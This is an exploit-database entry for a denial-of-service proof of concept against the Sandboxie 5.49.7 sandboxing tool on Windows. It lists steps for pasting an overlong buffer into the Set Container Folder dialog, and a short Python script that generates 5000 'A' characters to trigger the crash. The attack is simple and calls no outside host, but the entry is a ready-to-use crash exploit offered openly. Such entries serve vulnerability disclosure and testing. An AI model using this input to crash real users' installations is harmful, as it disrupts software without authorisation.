id: 36210
date: 05/07/2021
title: Sandboxie 5.49.7 - Denial of Service Exploit
author: Erick Galindo
cves: 

# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
# Author: Erick Galindo 
# Vendor Homepage: https://sandboxie-plus.com/
# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
# Version: 5.49.7
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Sandboxie Control->Sandbox->Set Container Folder
#3.- Paste the buffer in the input then press ok

buffer = "\x41" * 5000

f = open ("Sandboxie10.txt", "w")
f.write(buffer)
f.close()

#  0day.today [2023-03-22]  #